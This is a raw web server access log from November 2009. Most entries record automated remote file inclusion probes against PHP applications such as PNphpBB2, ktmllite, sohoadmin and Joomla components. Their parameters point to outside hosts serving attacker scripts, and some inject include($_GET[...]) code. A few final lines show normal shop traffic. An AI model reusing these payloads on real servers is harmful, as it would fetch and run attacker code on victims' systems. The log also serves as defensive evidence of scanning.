174.143.155.52 - - [13/Nov/2009:03:50:05 -0500] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:05 -0500] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:50:08 -0500] "GET /logs/access_log.Q109071900//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:50:10 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:21 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:21 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:21 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:30 -0500] "GET /popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:30 -0500] "GET /logs/access_log.Q109090800/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:30 -0500] "GET /logs/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:32 -0500] "GET /popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:32 -0500] "GET /logs/access_log.Q109090800/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:32 -0500] "GET /logs/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:32 -0500] "GET /popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:32 -0500] "GET /logs/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:32 -0500] "GET /logs/access_log.Q109090800/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:33 -0500] "GET /logs/access_log.Q109090800/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:33 -0500] "GET /logs/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:33 -0500] "GET /popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:34 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:34 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:35 -0500] "GET /logs/access_log.Q109053000/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:36 -0500] "GET /logs/access_log.Q109053000/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:36 -0500] "GET /logs/access_log.Q109053000/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:03:50:37 -0500] "GET /logs/access_log.Q109053000/popup.php?path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:42 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:43 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:45 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:50 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:50 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:52 -0500] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:52 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:52 -0500] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:53 -0500] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:53 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:53 -0500] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:50:53 -0500] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:08 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:08 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:08 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:08 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:10 -0500] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:10 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:10 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:11 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:13 -0500] "GET /logs/access_log.Q109080500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:16 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:16 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:17 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:17 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:19 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:19 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:19 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:20 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:20 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:25 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:26 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:28 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:29 -0500] "GET /logs/access_log.Q109080500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:30 -0500] "GET /logs/access_log.Q109080500%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:33 -0500] "GET /logs/access_log.Q109081500%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:33 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:33 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:34 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:34 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:34 -0500] "GET /logs/access_log.Q109081500%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:35 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:35 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:35 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:35 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:35 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:35 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:38 -0500] "GET /logs/access_log.Q109080500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:38 -0500] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:38 -0500] "GET /logs/access_log.Q109063000%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:39 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:51:39 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:51:40 -0500] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:51:42 -0500] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:42 -0500] "GET /logs/access_log.Q109080500%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:51:59 -0500] "GET /logs/access_log.Q109080500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:52:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:52:16 -0500] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:52:16 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:53:02 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:53:02 -0500] "GET /logs/access_log.Q109052600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:03:53:06 -0500] "GET /logs/access_log.Q109080500%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:53:11 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:53:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:23 -0500] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:23 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:23 -0500] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:23 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:24 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:24 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:24 -0500] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:29 -0500] "GET /logs/access_log.Q109070200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:29 -0500] "GET /logs/access_log.Q109070200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
67.227.134.140 - - [13/Nov/2009:03:53:29 -0500] "GET /logs/access_log.Q109070200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.831"
222.236.221.38 - - [13/Nov/2009:03:54:13 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:54:13 -0500] "GET //index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:54:13 -0500] "GET /logs/access_log.Q109080800//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:03:54:52 -0500] "GET /logs/access_log.Q109081000//index.php/?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.247.11.218 - - [13/Nov/2009:03:55:14 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:14 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:20 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:20 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:43 -0500] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493 HTTP/1.1" 200 37476 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:46 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [13/Nov/2009:03:55:47 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
